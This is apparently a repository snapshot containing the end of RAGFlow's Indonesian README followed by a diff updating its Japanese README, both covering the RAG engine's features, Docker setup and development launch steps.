        <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Rilis%20Terbaru" alt="Rilis Terbaru">
    </a>
    <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
        <img height="21" src="https://img.shields.io/badge/Lisensi-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="Lisensi">
    </a>
    <a href="https://deepwiki.com/infiniflow/ragflow">
        <img alt="Ask DeepWiki" src="https://deepwiki.com/badge.svg">
    </a>
 </p>
 <h4 align="center">
  <a href="https://ragflow.io/docs/dev/">Dokumentasi</a> |
  <a href="https://github.com/infiniflow/ragflow/issues/4214">Peta Jalan</a> |
  <a href="https://twitter.com/infiniflowai">Twitter</a> |
  <a href="https://discord.gg/NjYzJD3GM3">Discord</a> |
  <a href="https://demo.ragflow.io">Demo</a>
 </h4>
 #
 <details open>
 <summary><b>📕 Daftar Isi </b> </summary>
 - 💡 [Apa Itu RAGFlow?](#-apa-itu-ragflow)
 - 🎮 [Demo](#-demo)
 - 📌 [Pembaruan Terbaru](#-pembaruan-terbaru)
 - 🌟 [Fitur Utama](#-fitur-utama)
 - 🔎 [Arsitektur Sistem](#-arsitektur-sistem)
 - 🎬 [Mulai](#-mulai)
 - 🔧 [Konfigurasi](#-konfigurasi)
 - 🔧 [Membangun Image Docker tanpa Model Embedding](#-membangun-image-docker-tanpa-model-embedding)
 - 🔧 [Membangun Image Docker dengan Model Embedding](#-membangun-image-docker-dengan-model-embedding)
 - 🔨 [Meluncurkan aplikasi dari Sumber untuk Pengembangan](#-meluncurkan-aplikasi-dari-sumber-untuk-pengembangan)
 - 📚 [Dokumentasi](#-dokumentasi)
 - 📜 [Peta Jalan](#-peta-jalan)
 - 🏄 [Komunitas](#-komunitas)
 - 🙌 [Kontribusi](#-kontribusi)
 </details>
 ## 💡 Apa Itu RAGFlow?
 [RAGFlow](https://ragflow.io/) adalah mesin RAG (Retrieval-Augmented Generation) open-source berbasis pemahaman dokumen yang mendalam. Platform ini menyediakan alur kerja RAG yang efisien untuk bisnis dengan berbagai skala, menggabungkan LLM (Large Language Models) untuk menyediakan kemampuan tanya-jawab yang benar dan didukung oleh referensi dari data terstruktur kompleks.
 ## 🎮 Demo
 Coba demo kami di [https://demo.ragflow.io](https://demo.ragflow.io).
 <div align="center" style="margin-top:20px;margin-bottom:20px;">
 <img src="https://raw.githubusercontent.com/infiniflow/ragflow-docs/refs/heads/image/image/chunking.gif" width="1200"/>
 <img src="https://raw.githubusercontent.com/infiniflow/ragflow-docs/refs/heads/image/image/agentic-dark.gif" width="1200"/>
 </div>
 ## 🔥 Pembaruan Terbaru
 - 2025-08-01 Mendukung Alur Kerja agen.
 - 2025-05-23 Menambahkan komponen pelaksana kode Python/JS ke Agen.
 - 2025-05-05 Mendukung kueri lintas bahasa.
 - 2025-03-19 Mendukung penggunaan model multi-modal untuk memahami gambar di dalam file PDF atau DOCX.
 - 2025-02-28 dikombinasikan dengan pencarian Internet (TAVILY), mendukung penelitian mendalam untuk LLM apa pun.
 - 2024-12-18 Meningkatkan model Analisis Tata Letak Dokumen di DeepDoc.
 - 2024-08-22 Dukungan untuk teks ke pernyataan SQL melalui RAG.
 ## 🎉 Tetap Terkini
 ⭐️ Star repositori kami untuk tetap mendapat informasi tentang fitur baru dan peningkatan menarik! 🌟
 <div align="center" style="margin-top:20px;margin-bottom:20px;">
 <img src="https://github.com/user-attachments/assets/18c9707e-b8aa-4caf-a154-037089c105ba" width="1200"/>
 </div>
 ## 🌟 Fitur Utama
 ### 🍭 **"Kualitas Masuk, Kualitas Keluar"**
 - Ekstraksi pengetahuan berbasis pemahaman dokumen mendalam dari data tidak terstruktur dengan format yang rumit.
 - Menemukan "jarum di tumpukan data" dengan token yang hampir tidak terbatas.
 ### 🍱 **Pemotongan Berbasis Template**
 - Cerdas dan dapat dijelaskan.
 - Banyak pilihan template yang tersedia.
 ### 🌱 **Referensi yang Didasarkan pada Data untuk Mengurangi Hallusinasi**
 - Visualisasi pemotongan teks memungkinkan intervensi manusia.
 - Tampilan cepat referensi kunci dan referensi yang dapat dilacak untuk mendukung jawaban yang didasarkan pada fakta.
 ### 🍔 **Kompatibilitas dengan Sumber Data Heterogen**
 - Mendukung Word, slide, excel, txt, gambar, salinan hasil scan, data terstruktur, halaman web, dan banyak lagi.
 ### 🛀 **Alur Kerja RAG yang Otomatis dan Mudah**
 - Orkestrasi RAG yang ramping untuk bisnis kecil dan besar.
 - LLM yang dapat dikonfigurasi serta model embedding.
 - Peringkat ulang berpasangan dengan beberapa pengambilan ulang.
 - API intuitif untuk integrasi yang mudah dengan bisnis.
 ## 🔎 Arsitektur Sistem
 <div align="center" style="margin-top:20px;margin-bottom:20px;">
 <img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
 </div>
 ## 🎬 Mulai
 ### 📝 Prasyarat
 - CPU >= 4 inti
 - RAM >= 16 GB
 - Disk >= 50 GB
 - Docker >= 24.0.0 & Docker Compose >= v2.26.1
 - [gVisor](https://gvisor.dev/docs/user_guide/install/): Hanya diperlukan jika Anda ingin menggunakan fitur eksekutor kode (sandbox) dari RAGFlow.
 > [!TIP]
 > Jika Anda belum menginstal Docker di komputer lokal Anda (Windows, Mac, atau Linux), lihat [Install Docker Engine](https://docs.docker.com/engine/install/).
 ### 🚀 Menjalankan Server
 1. Pastikan `vm.max_map_count` >= 262144:
   > Untuk memeriksa nilai `vm.max_map_count`:
   >
   > ```bash
   > $ sysctl vm.max_map_count
   > ```
   >
   > Jika nilainya kurang dari 262144, setel ulang `vm.max_map_count` ke setidaknya 262144:
   >
   > ```bash
   > # Dalam contoh ini, kita atur menjadi 262144:
   > $ sudo sysctl -w vm.max_map_count=262144
   > ```
   >
   > Perubahan ini akan hilang setelah sistem direboot. Untuk membuat perubahan ini permanen, tambahkan atau perbarui nilai
   > `vm.max_map_count` di **/etc/sysctl.conf**:
   >
   > ```bash
   > vm.max_map_count=262144
   > ```
 2. Clone repositori:
   ```bash
   $ git clone https://github.com/infiniflow/ragflow.git
   ```
 3. Bangun image Docker pre-built dan jalankan server:
 > [!CAUTION]
 > Semua gambar Docker dibangun untuk platform x86. Saat ini, kami tidak menawarkan gambar Docker untuk ARM64.
 > Jika Anda menggunakan platform ARM64, [silakan gunakan panduan ini untuk membangun gambar Docker yang kompatibel dengan sistem Anda](https://ragflow.io/docs/dev/build_docker_image).
 > Perintah di bawah ini mengunduh edisi v0.20.0-slim dari gambar Docker RAGFlow. Silakan merujuk ke tabel berikut untuk deskripsi berbagai edisi RAGFlow. Untuk mengunduh edisi RAGFlow yang berbeda dari v0.20.0-slim, perbarui variabel RAGFLOW_IMAGE di docker/.env sebelum menggunakan docker compose untuk memulai server. Misalnya, atur RAGFLOW_IMAGE=infiniflow/ragflow:v0.20.0 untuk edisi lengkap v0.20.0.
 ```bash
 $ cd ragflow/docker
 # Use CPU for embedding and DeepDoc tasks:
 $ docker compose -f docker-compose.yml up -d
 # To use GPU to accelerate embedding and DeepDoc tasks:
 # docker compose -f docker-compose-gpu.yml up -d
 ```
 | RAGFlow image tag | Image size (GB) | Has embedding models? | Stable?                  |
 | ----------------- | --------------- | --------------------- | ------------------------ |
 | v0.20.0           | &approx;9       | :heavy_check_mark:    | Stable release           |
 | v0.20.0-slim      | &approx;2       | ❌                    | Stable release           |
 | nightly           | &approx;9       | :heavy_check_mark:    | _Unstable_ nightly build |
 | nightly-slim      | &approx;2       | ❌                    | _Unstable_ nightly build |
 1. Periksa status server setelah server aktif dan berjalan:
   ```bash
   $ docker logs -f ragflow-server
   ```
   _Output berikut menandakan bahwa sistem berhasil diluncurkan:_
   ```bash
         ____   ___    ______ ______ __
        / __ \ /   |  / ____// ____// /____  _      __
       / /_/ // /| | / / __ / /_   / // __ \| | /| / /
      / _, _// ___ |/ /_/ // __/  / // /_/ /| |/ |/ /
     /_/ |_|/_/  |_|\____//_/    /_/ \____/ |__/|__/
    * Running on all addresses (0.0.0.0)
   ```
   > Jika Anda melewatkan langkah ini dan langsung login ke RAGFlow, browser Anda mungkin menampilkan error `network anormal`
   > karena RAGFlow mungkin belum sepenuhnya siap.
 2. Buka browser web Anda, masukkan alamat IP server Anda, dan login ke RAGFlow.
   > Dengan pengaturan default, Anda hanya perlu memasukkan `http://IP_DEVICE_ANDA` (**tanpa** nomor port) karena
   > port HTTP default `80` bisa dihilangkan saat menggunakan konfigurasi default.
 3. Dalam [service_conf.yaml.template](./docker/service_conf.yaml.template), pilih LLM factory yang diinginkan di `user_default_llm` dan perbarui
   bidang `API_KEY` dengan kunci API yang sesuai.
   > Lihat [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup) untuk informasi lebih lanjut.
   _Sistem telah siap digunakan!_
 ## 🔧 Konfigurasi
 Untuk konfigurasi sistem, Anda perlu mengelola file-file berikut:
 - [.env](./docker/.env): Menyimpan pengaturan dasar sistem, seperti `SVR_HTTP_PORT`, `MYSQL_PASSWORD`, dan
  `MINIO_PASSWORD`.
 - [service_conf.yaml.template](./docker/service_conf.yaml.template): Mengonfigurasi aplikasi backend.
 - [docker-compose.yml](./docker/docker-compose.yml): Sistem ini bergantung pada [docker-compose.yml](./docker/docker-compose.yml) untuk memulai.
 Untuk memperbarui port HTTP default (80), buka [docker-compose.yml](./docker/docker-compose.yml) dan ubah `80:80`
 menjadi `<YOUR_SERVING_PORT>:80`.
 Pembaruan konfigurasi ini memerlukan reboot semua kontainer agar efektif:
 > ```bash
 > $ docker compose -f docker-compose.yml up -d
 > ```
 ## 🔧 Membangun Docker Image tanpa Model Embedding
 Image ini berukuran sekitar 2 GB dan bergantung pada aplikasi LLM eksternal dan embedding.
 ```bash
 git clone https://github.com/infiniflow/ragflow.git
 cd ragflow/
 docker build --platform linux/amd64 --build-arg LIGHTEN=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
 ```
 ## 🔧 Membangun Docker Image Termasuk Model Embedding
 Image ini berukuran sekitar 9 GB. Karena sudah termasuk model embedding, ia hanya bergantung pada aplikasi LLM eksternal.
 ```bash
 git clone https://github.com/infiniflow/ragflow.git
 cd ragflow/
 docker build --platform linux/amd64 -f Dockerfile -t infiniflow/ragflow:nightly .
 ```
 ## 🔨 Menjalankan Aplikasi dari untuk Pengembangan
 1. Instal uv, atau lewati langkah ini jika sudah terinstal:
   ```bash
   pipx install uv pre-commit
   ```
 2. Clone kode sumber dan instal dependensi Python:
   ```bash
   git clone https://github.com/infiniflow/ragflow.git
   cd ragflow/
   uv sync --python 3.10 --all-extras # install RAGFlow dependent python modules
   uv run download_deps.py
   pre-commit install
   ```
 3. Jalankan aplikasi yang diperlukan (MinIO, Elasticsearch, Redis, dan MySQL) menggunakan Docker Compose:
   ```bash
   docker compose -f docker/docker-compose-base.yml up -d
   ```
   Tambahkan baris berikut ke `/etc/hosts` untuk memetakan semua host yang ditentukan di **conf/service_conf.yaml** ke `127.0.0.1`:
   ```
   127.0.0.1       es01 infinity mysql minio redis sandbox-executor-manager
   ```
 4. Jika Anda tidak dapat mengakses HuggingFace, atur variabel lingkungan `HF_ENDPOINT` untuk menggunakan situs mirror:
   ```bash
   export HF_ENDPOINT=https://hf-mirror.com
   ```
 5. Jika sistem operasi Anda tidak memiliki jemalloc, instal sebagai berikut:
   ```bash
   # ubuntu
   sudo apt-get install libjemalloc-dev
   # centos
   sudo yum install jemalloc
   ```
 6. Jalankan aplikasi backend:
   ```bash
   source .venv/bin/activate
   export PYTHONPATH=$(pwd)
   bash docker/launch_backend_service.sh
   ```
 7. Instal dependensi frontend:
   ```bash
   cd web
   npm install
   ```
 8. Jalankan aplikasi frontend:
   ```bash
   npm run dev
   ```
   _Output berikut menandakan bahwa sistem berhasil diluncurkan:_
   ![](https://github.com/user-attachments/assets/0daf462c-a24d-4496-a66f-92533534e187)
 9. Hentikan layanan front-end dan back-end RAGFlow setelah pengembangan selesai:
   ```bash
   pkill -f "ragflow_server.py|task_executor.py"
   ```
 ## 📚 Dokumentasi
 - [Quickstart](https://ragflow.io/docs/dev/)
 - [Configuration](https://ragflow.io/docs/dev/configurations)
 - [Release notes](https://ragflow.io/docs/dev/release_notes)
 - [User guides](https://ragflow.io/docs/dev/category/guides)
 - [Developer guides](https://ragflow.io/docs/dev/category/developers)
 - [References](https://ragflow.io/docs/dev/category/references)
 - [FAQs](https://ragflow.io/docs/dev/faq)
 ## 📜 Roadmap
 Lihat [Roadmap RAGFlow 2025](https://github.com/infiniflow/ragflow/issues/4214)
 ## 🏄 Komunitas
 - [Discord](https://discord.gg/NjYzJD3GM3)
 - [Twitter](https://twitter.com/infiniflowai)
 - [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
 ## 🙌 Kontribusi
 RAGFlow berkembang melalui kolaborasi open-source. Dalam semangat ini, kami menerima kontribusi dari komunitas.
 Jika Anda ingin berpartisipasi, tinjau terlebih dahulu [Panduan Kontribusi](https://ragflow.io/docs/dev/contributing).
--- a/README_ja.md
+++ b/README_ja.md
@ -1,203 +1,364 @@
-<div align="center">
+<div align="center">
-<a href="https://demo.ragflow.io/">
+<a href="https://demo.ragflow.io/">
-<img src="web/src/assets/logo-with-text.png" width="350" alt="ragflow logo">
+<img src="web/src/assets/logo-with-text.png" width="350" alt="ragflow logo">
-</a>
+</a>
-</div>
+</div>
-
+
-<p align="center">
+<p align="center">
-  <a href="./README.md">English</a> |
+  <a href="./README.md"><img alt="README in English" src="https://img.shields.io/badge/English-DFE0E5"></a>
-  <a href="./README_zh.md">简体中文</a> |
+  <a href="./README_zh.md"><img alt="简体中文版自述文件" src="https://img.shields.io/badge/简体中文-DFE0E5"></a>
-  <a href="./README_ja.md">日本語</a>
+  <a href="./README_tzh.md"><img alt="繁體中文版自述文件" src="https://img.shields.io/badge/繁體中文-DFE0E5"></a>
-</p>
+  <a href="./README_ja.md"><img alt="日本語のREADME" src="https://img.shields.io/badge/日本語-DBEDFA"></a>
-
+  <a href="./README_ko.md"><img alt="한국어" src="https://img.shields.io/badge/한국어-DFE0E5"></a>
-<p align="center">
+  <a href="./README_id.md"><img alt="Bahasa Indonesia" src="https://img.shields.io/badge/Bahasa Indonesia-DFE0E5"></a>
-    <a href="https://github.com/infiniflow/ragflow/releases/latest">
+  <a href="./README_pt_br.md"><img alt="Português(Brasil)" src="https://img.shields.io/badge/Português(Brasil)-DFE0E5"></a>
-        <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
+</p>
-    </a>
+
-    <a href="https://demo.ragflow.io" target="_blank">
+<p align="center">
-        <img alt="Static Badge" src="https://img.shields.io/badge/RAGFLOW-LLM-white?&labelColor=dd0af7"></a>
+    <a href="https://x.com/intent/follow?screen_name=infiniflowai" target="_blank">
-    <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
+        <img src="https://img.shields.io/twitter/follow/infiniflow?logo=X&color=%20%23f5f5f5" alt="follow on X(Twitter)">
-        <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.3.2-brightgreen"
+    </a>
-            alt="docker pull infiniflow/ragflow:v0.3.2"></a>
+    <a href="https://demo.ragflow.io" target="_blank">
-      <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
+        <img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99">
-    <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?style=flat-square&labelColor=d4eaf7&color=7d09f1" alt="license">
+    </a>
-  </a>
+    <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
-</p>
+        <img src="https://img.shields.io/docker/pulls/infiniflow/ragflow?label=Docker%20Pulls&color=0db7ed&logo=docker&logoColor=white&style=flat-square" alt="docker pull infiniflow/ragflow:v0.20.0">
-
+    </a>
-## 💡 RAGFlow とは？
+    <a href="https://github.com/infiniflow/ragflow/releases/latest">
-
+        <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
-[RAGFlow](https://demo.ragflow.io) は、深い文書理解に基づいたオープンソースの RAG (Retrieval-Augmented Generation) エンジンである。LLM（大規模言語モデル）を組み合わせることで、様々な複雑なフォーマットのデータから根拠のある引用に裏打ちされた、信頼できる質問応答機能を実現し、あらゆる規模のビジネスに適した RAG ワークフローを提供します。
+    </a>
-
+    <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
-## 🌟 主な特徴
+        <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
-
+    </a>
-### 🍭 **"Quality in, quality out"**
+    <a href="https://deepwiki.com/infiniflow/ragflow">
-
+        <img alt="Ask DeepWiki" src="https://deepwiki.com/badge.svg">
- 複雑な形式の非構造化データからの[深い文書理解](./deepdoc/README.md)ベースの知識抽出。
+    </a>
- 無限のトークンから"干し草の山の中の針"を見つける。
+</p>
-
+
-### 🍱 **テンプレートベースのチャンク化**
+<h4 align="center">
-
+  <a href="https://ragflow.io/docs/dev/">Document</a> |
- 知的で解釈しやすい。
+  <a href="https://github.com/infiniflow/ragflow/issues/4214">Roadmap</a> |
- テンプレートオプションが豊富。
+  <a href="https://twitter.com/infiniflowai">Twitter</a> |
-
+  <a href="https://discord.gg/NjYzJD3GM3">Discord</a> |
-### 🌱 **ハルシネーションが軽減された根拠のある引用**
+  <a href="https://demo.ragflow.io">Demo</a>
-
+</h4>
- 可視化されたテキストチャンキング（text chunking）で人間の介入を可能にする。
+
- 重要な参考文献のクイックビューと、追跡可能な引用によって根拠ある答えをサポートする。
+#
-
+
-### 🍔 **多様なデータソースとの互換性**
+## 💡 RAGFlow とは？
-
+
- Word、スライド、Excel、txt、画像、スキャンコピー、構造化データ、Web ページなどをサポート。
+[RAGFlow](https://ragflow.io/) は、深い文書理解に基づいたオープンソースの RAG (Retrieval-Augmented Generation) エンジンである。LLM（大規模言語モデル）を組み合わせることで、様々な複雑なフォーマットのデータから根拠のある引用に裏打ちされた、信頼できる質問応答機能を実現し、あらゆる規模のビジネスに適した RAG ワークフローを提供します。
-
+
-### 🛀 **自動化された楽な RAG ワークフロー**
+## 🎮 Demo
-
+
- 個人から大企業まで対応できる RAG オーケストレーション（orchestration）。
+デモをお試しください：[https://demo.ragflow.io](https://demo.ragflow.io)。
- カスタマイズ可能な LLM とエンベッディングモデル。
+
- 複数の想起と融合された再ランク付け。
+<div align="center" style="margin-top:20px;margin-bottom:20px;">
- 直感的な API によってビジネスとの統合がシームレスに。
+<img src="https://raw.githubusercontent.com/infiniflow/ragflow-docs/refs/heads/image/image/chunking.gif" width="1200"/>
-
+<img src="https://raw.githubusercontent.com/infiniflow/ragflow-docs/refs/heads/image/image/agentic-dark.gif" width="1200"/>
-## 📌 最新の機能
+</div>
-
+
- 2024-04-19 会話 API をサポートします ([詳細](./docs/conversation_api.md))。
+## 🔥 最新情報
- 2024-04-16 [BCEmbedding](https://github.com/netease-youdao/BCEmbedding) から埋め込みモデル「bce-embedding-base_v1」を追加します。
+
- 2024-04-16 [FastEmbed](https://github.com/qdrant/fastembed) は、軽量かつ高速な埋め込み用に設計されています。
+- 2025-08-01 エージェントワークフローをサポートします。
- 2024-04-11 ローカル LLM デプロイメント用に [Xinference](./docs/xinference.md) をサポートします。
+- 2025-05-23 エージェントに Python/JS コードエグゼキュータコンポーネントを追加しました。
- 2024-04-10 メソッド「Laws」に新しいレイアウト認識モデルを追加します。
+- 2025-05-05 言語間クエリをサポートしました。
- 2024-04-08 [Ollama](./docs/ollama.md) を使用した大規模モデルのローカライズされたデプロイメントをサポートします。
+- 2025-03-19 PDFまたはDOCXファイル内の画像を理解するために、多モーダルモデルを使用することをサポートします。
- 2024-04-07 中国語インターフェースをサポートします。
+- 2025-02-28 インターネット検索 (TAVILY) と組み合わせて、あらゆる LLM の詳細な調査をサポートします。
-
+- 2024-12-18 DeepDoc のドキュメント レイアウト分析モデルをアップグレードします。
-## 🔎 システム構成
+- 2024-08-22 RAG を介して SQL ステートメントへのテキストをサポートします。
-
+
-<div align="center" style="margin-top:20px;margin-bottom:20px;">
+## 🎉 続きを楽しみに
-<img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
+
-</div>
+⭐️ リポジトリをスター登録して、エキサイティングな新機能やアップデートを最新の状態に保ちましょう！すべての新しいリリースに関する即時通知を受け取れます！ 🌟
-
+
-## 🎬 初期設定
+<div align="center" style="margin-top:20px;margin-bottom:20px;">
-
+<img src="https://github.com/user-attachments/assets/18c9707e-b8aa-4caf-a154-037089c105ba" width="1200"/>
-### 📝 必要条件
+</div>
-
+
- CPU >= 4 cores
+## 🌟 主な特徴
- RAM >= 16 GB
+
- Disk >= 50 GB
+### 🍭 **"Quality in, quality out"**
- Docker >= 24.0.0 & Docker Compose >= v2.26.1
+
-  > ローカルマシン（Windows、Mac、または Linux）に Docker をインストールしていない場合は、[Docker Engine のインストール](https://docs.docker.com/engine/install/) を参照してください。
+- 複雑な形式の非構造化データからの[深い文書理解](./deepdoc/README.md)ベースの知識抽出。
-
+- 無限のトークンから"干し草の山の中の針"を見つける。
-### 🚀 サーバーを起動
+
-
+### 🍱 **テンプレートベースのチャンク化**
-1. `vm.max_map_count` >= 262144 であることを確認する【[もっと](./docs/max_map_count.md)】:
+
-
+- 知的で解釈しやすい。
-   > `vm.max_map_count` の値をチェックするには:
+- テンプレートオプションが豊富。
-   >
+
-   > ```bash
+### 🌱 **ハルシネーションが軽減された根拠のある引用**
-   > $ sysctl vm.max_map_count
+
-   > ```
+- 可視化されたテキストチャンキング（text chunking）で人間の介入を可能にする。
-   >
+- 重要な参考文献のクイックビューと、追跡可能な引用によって根拠ある答えをサポートする。
-   > `vm.max_map_count` が 262144 より大きい値でなければリセットする。
+
-   >
+### 🍔 **多様なデータソースとの互換性**
-   > ```bash
+
-   > # In this case, we set it to 262144:
+- Word、スライド、Excel、txt、画像、スキャンコピー、構造化データ、Web ページなどをサポート。
-   > $ sudo sysctl -w vm.max_map_count=262144
+
-   > ```
+### 🛀 **自動化された楽な RAG ワークフロー**
-   >
+
-   > この変更はシステム再起動後にリセットされる。変更を恒久的なものにするには、**/etc/sysctl.conf** の `vm.max_map_count` 値を適宜追加または更新する:
+- 個人から大企業まで対応できる RAG オーケストレーション（orchestration）。
-   >
+- カスタマイズ可能な LLM とエンベッディングモデル。
-   > ```bash
+- 複数の想起と融合された再ランク付け。
-   > vm.max_map_count=262144
+- 直感的な API によってビジネスとの統合がシームレスに。
-   > ```
+
-
+## 🔎 システム構成
-2. リポジトリをクローンする:
+
-
+<div align="center" style="margin-top:20px;margin-bottom:20px;">
-   ```bash
+<img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
-   $ git clone https://github.com/infiniflow/ragflow.git
+</div>
-   ```
+
-
+## 🎬 初期設定
-3. ビルド済みの Docker イメージをビルドし、サーバーを起動する:
+
-
+### 📝 必要条件
-   ```bash
+
-   $ cd ragflow/docker
+- CPU >= 4 cores
-   $ chmod +x ./entrypoint.sh
+- RAM >= 16 GB
-   $ docker compose up -d
+- Disk >= 50 GB
-   ```
+- Docker >= 24.0.0 & Docker Compose >= v2.26.1
-
+- [gVisor](https://gvisor.dev/docs/user_guide/install/): RAGFlowのコード実行（サンドボックス）機能を利用する場合のみ必要です。
-   > コアイメージのサイズは約 15 GB で、ロードに時間がかかる場合があります。
+
-
+> [!TIP]
-4. サーバーを立ち上げた後、サーバーの状態を確認する:
+> ローカルマシン（Windows、Mac、または Linux）に Docker をインストールしていない場合は、[Docker Engine のインストール](https://docs.docker.com/engine/install/) を参照してください。
-
+
-   ```bash
+### 🚀 サーバーを起動
-   $ docker logs -f ragflow-server
+
-   ```
+1. `vm.max_map_count` >= 262144 であることを確認する:
-
+
-   _以下の出力は、システムが正常に起動したことを確認するものです:_
+   > `vm.max_map_count` の値をチェックするには:
-
+   >
-   ```bash
+   > ```bash
-       ____                 ______ __
+   > $ sysctl vm.max_map_count
-      / __ \ ____ _ ____ _ / ____// /____  _      __
+   > ```
-     / /_/ // __ `// __ `// /_   / // __ \| | /| / /
+   >
-    / _, _// /_/ // /_/ // __/  / // /_/ /| |/ |/ /
+   > `vm.max_map_count` が 262144 より大きい値でなければリセットする。
-   /_/ |_| \__,_/ \__, //_/    /_/ \____/ |__/|__/
+   >
-                 /____/
+   > ```bash
-
+   > # In this case, we set it to 262144:
-    * Running on all addresses (0.0.0.0)
+   > $ sudo sysctl -w vm.max_map_count=262144
-    * Running on http://127.0.0.1:9380
+   > ```
-    * Running on http://x.x.x.x:9380
+   >
-    INFO:werkzeug:Press CTRL+C to quit
+   > この変更はシステム再起動後にリセットされる。変更を恒久的なものにするには、**/etc/sysctl.conf** の `vm.max_map_count` 値を適宜追加または更新する:
-   ```
+   >
-   > もし確認ステップをスキップして直接 RAGFlow にログインした場合、その時点で RAGFlow が完全に初期化されていない可能性があるため、ブラウザーがネットワーク異常エラーを表示するかもしれません。
+   > ```bash
-
+   > vm.max_map_count=262144
-5. ウェブブラウザで、プロンプトに従ってサーバーの IP アドレスを入力し、RAGFlow にログインします。
+   > ```
-   > デフォルトの設定を使用する場合、デフォルトの HTTP サービングポート `80` は省略できるので、与えられたシナリオでは、`http://IP_OF_YOUR_MACHINE`（ポート番号は省略）だけを入力すればよい。
+
-6. [service_conf.yaml](./docker/service_conf.yaml) で、`user_default_llm` で希望の LLM ファクトリを選択し、`API_KEY` フィールドを対応する API キーで更新する。
+2. リポジトリをクローンする:
-
+
-   > 詳しくは [./docs/llm_api_key_setup.md](./docs/llm_api_key_setup.md) を参照してください。
+   ```bash
-
+   $ git clone https://github.com/infiniflow/ragflow.git
-   _これで初期設定完了！ショーの開幕です！_
+   ```
-
+
-## 🔧 コンフィグ
+3. ビルド済みの Docker イメージをビルドし、サーバーを起動する:
-
+
-システムコンフィグに関しては、以下のファイルを管理する必要がある:
+> [!CAUTION]
-
+> 現在、公式に提供されているすべての Docker イメージは x86 アーキテクチャ向けにビルドされており、ARM64 用の Docker イメージは提供されていません。
- [.env](./docker/.env): `SVR_HTTP_PORT`、`MYSQL_PASSWORD`、`MINIO_PASSWORD` などのシステムの基本設定を保持する。
+> ARM64 アーキテクチャのオペレーティングシステムを使用している場合は、[このドキュメント](https://ragflow.io/docs/dev/build_docker_image)を参照して Docker イメージを自分でビルドしてください。
- [service_conf.yaml](./docker/service_conf.yaml): バックエンドのサービスを設定します。
+
- [docker-compose.yml](./docker/docker-compose.yml): システムの起動は [docker-compose.yml](./docker/docker-compose.yml) に依存している。
+   > 以下のコマンドは、RAGFlow Docker イメージの v0.20.0-slim エディションをダウンロードします。異なる RAGFlow エディションの説明については、以下の表を参照してください。v0.20.0-slim とは異なるエディションをダウンロードするには、docker/.env ファイルの RAGFLOW_IMAGE 変数を適宜更新し、docker compose を使用してサーバーを起動してください。例えば、完全版 v0.20.0 をダウンロードするには、RAGFLOW_IMAGE=infiniflow/ragflow:v0.20.0 と設定します。
-
+
-[.env](./docker/.env) ファイルの変更が [service_conf.yaml](./docker/service_conf.yaml) ファイルの内容と一致していることを確認する必要があります。
+   ```bash
-
+   $ cd ragflow/docker
-> [./docker/README](./docker/README.md) ファイルは環境設定とサービスコンフィグの詳細な説明を提供し、[./docker/README](./docker/README.md) ファイルに記載されている全ての環境設定が [service_conf.yaml](./docker/service_conf.yaml) ファイルの対応するコンフィグと一致していることを確認することが義務付けられています。
+   # Use CPU for embedding and DeepDoc tasks:
-
+   $ docker compose -f docker-compose.yml up -d
-デフォルトの HTTP サービングポート(80)を更新するには、[docker-compose.yml](./docker/docker-compose.yml) にアクセスして、`80:80` を `<YOUR_SERVING_PORT>:80` に変更します。
+
-
+   # To use GPU to accelerate embedding and DeepDoc tasks:
-> すべてのシステム設定のアップデートを有効にするには、システムの再起動が必要です:
+   # docker compose -f docker-compose-gpu.yml up -d
->
+   ```
-> ```bash
+
-> $ docker-compose up -d
+   | RAGFlow image tag | Image size (GB) | Has embedding models? | Stable?                  |
-> ```
+   | ----------------- | --------------- | --------------------- | ------------------------ |
-
+   | v0.20.0           | &approx;9       | :heavy_check_mark:    | Stable release           |
-## 🛠️ ソースからビルドする
+   | v0.20.0-slim      | &approx;2       | ❌                    | Stable release           |
-
+   | nightly           | &approx;9       | :heavy_check_mark:    | _Unstable_ nightly build |
-ソースからDockerイメージをビルドするには:
+   | nightly-slim      | &approx;2       | ❌                     | _Unstable_ nightly build |
-
+
-```bash
+1. サーバーを立ち上げた後、サーバーの状態を確認する:
-$ git clone https://github.com/infiniflow/ragflow.git
+
-$ cd ragflow/
+   ```bash
-$ docker build -t infiniflow/ragflow:v0.3.2 .
+   $ docker logs -f ragflow-server
-$ cd ragflow/docker
+   ```
-$ chmod +x ./entrypoint.sh
+
-$ docker compose up -d
+   _以下の出力は、システムが正常に起動したことを確認するものです:_
-```
+
-
+   ```bash
-## 📚 ドキュメンテーション
+        ____   ___    ______ ______ __
-
+       / __ \ /   |  / ____// ____// /____  _      __
- [FAQ](./docs/faq.md)
+      / /_/ // /| | / / __ / /_   / // __ \| | /| / /
-
+     / _, _// ___ |/ /_/ // __/  / // /_/ /| |/ |/ /
-## 📜 ロードマップ
+    /_/ |_|/_/  |_|\____//_/    /_/ \____/ |__/|__/
-
+
-[RAGFlow ロードマップ 2024](https://github.com/infiniflow/ragflow/issues/162) を参照
+    * Running on all addresses (0.0.0.0)
-
+   ```
-## 🏄 コミュニティ
+
-
+   > もし確認ステップをスキップして直接 RAGFlow にログインした場合、その時点で RAGFlow が完全に初期化されていない可能性があるため、ブラウザーがネットワーク異常エラーを表示するかもしれません。
